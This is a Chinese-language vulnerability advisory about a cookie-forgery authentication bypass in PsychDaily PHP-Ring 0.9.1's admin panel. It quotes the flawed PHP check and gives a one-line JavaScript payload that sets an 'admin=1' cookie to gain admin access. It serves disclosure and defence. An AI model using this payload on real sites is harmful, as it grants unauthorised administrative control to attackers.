发布日期：2008-08-10
更新日期：2008-08-12

受影响系统：

PsychDaily PHP-Ring 0.9.1

描述：

---

BUGTRAQ  ID: 30624

PHP-Ring是一个web ring系统，站点可通过webring系统增加访问量和指向站点的链接。  

PHP-Ring没有安全地处理cookie。管理登录成功后，脚本会创建一个cookie显示用户所登录管理区域的剩余部分，但这个cookie不包含任何口令，因此用户可以伪造类似于合法登录的管理员cookie获得非授权访问。

以下是/admin/wr_admin.php中的有漏洞代码：

$cookie = $_COOKIE[admin]; //check for cookie

if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") {
    include("../templates/wr_header.php");
    echo "Enter admin username and password to log in";
    ....
    ....
    ..
    } else {
function adminhome() // load admin settings

<*来源：Virangar Security Team （www.virangar.net）
  
  链接：http://www.milw0rm.com/exploits/6225
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

javascript:document.cookie = "admin=1; path=/";

建议：

---

厂商补丁：

PsychDaily
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.psychdaily.com/article/569/

浏览次数：2452
严重程度：0（网友投票）